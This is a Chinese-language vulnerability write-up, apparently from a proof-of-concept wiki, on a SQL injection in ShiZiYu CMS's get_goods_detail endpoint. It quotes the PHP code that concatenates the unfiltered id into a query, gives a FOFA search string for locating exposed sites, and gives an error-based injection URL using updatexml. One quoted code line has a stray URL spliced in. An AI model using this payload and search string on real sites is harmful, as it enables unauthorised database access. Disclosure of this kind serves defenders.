# 狮子鱼CMS ApigoodsController.class.php SQL注入漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

狮子鱼CMS ApiController.class.php 参数过滤存在不严谨，导致SQL注入漏洞

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

&#x20;Note

狮子鱼CMS

### FOFA <a href="#fofa" id="fofa"></a>

&#x20;Note

"/seller.php?s=/Public/login"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

登录页面如下

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqCFAXKvJC3-jSCtiq%2F-MhqE3J1q7zVpidF_ab1%2Fimage.png?alt=media\&token=aa119a19-3693-41ba-b02c-b1ab0189e69d)

存在漏洞的文件为 **ApigoodsController.class.php** , 关键位置为

```
 public function get_goods_detail() {
        $id = I('get.id');
        $pin_id = I('get.pin_id', 0);

        $token = I('get.token');

        $weprogram_token = M('weprogram_token')->field('member_id')->where( array('token' =>$token) )->find();
        $member_id = $weprogram_token['member_id'];




        $need_data = array();
        $sql = "select g.*,gd.description,gd.is_untake_level,level_discount,gd.video_src,gd.video_size_width,gd.vedio_size_height,gd.is_video,
            gd.summary,gd.share_title,gd.activity_summary,gd.tag from " . C('DB_PREFIX') . "goods g," . C('DB_PREFIX') . "goods_description gd where g.goods_id=gd.goods_id and g.goods_id=" . $id;
        $goods = M()->query($sql);
        $pin_model = D('Home/Pin');
        $goods_model = D('Home/Goods');
        $qian = array(
            "/Uploads/image"
        );
        $c_site_url = str_replace('/dan','',C('SITE_URL'));
        $hou = array(
            $c_site_url . "/Uploads/image"
        );
        $goods[0]['video_src'] = C('SITE_URL')."Uploads/http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/".$goods[0]['video_src'];

        $goods[0]['description'] = str_replace($qian, $hou, $goods[0]['description']);
        $goods[0]['description'] = htmlspecialchars_decode($goods[0]['description']);
        $qian = array(
            "\r\n"
        );
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqCFAXKvJC3-jSCtiq%2F-MhqE7JV3Cg0HdGvVixb%2Fimage.png?alt=media\&token=8496beb6-47ef-4e8b-92fe-e366982a4bd4)

漏洞测试为

```
https://xxx.xxx.xx.xxx/index.php?s=apigoods/get_goods_detail&id=1%20and%20updatexml(1,concat(0x7e,md5(1),0x7e),1)
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhqCFAXKvJC3-jSCtiq%2F-MhqEBzwFAcCZm2D3pwv%2Fimage.png?alt=media\&token=c89dea0c-fb3a-4253-9025-3874ded0e5da)
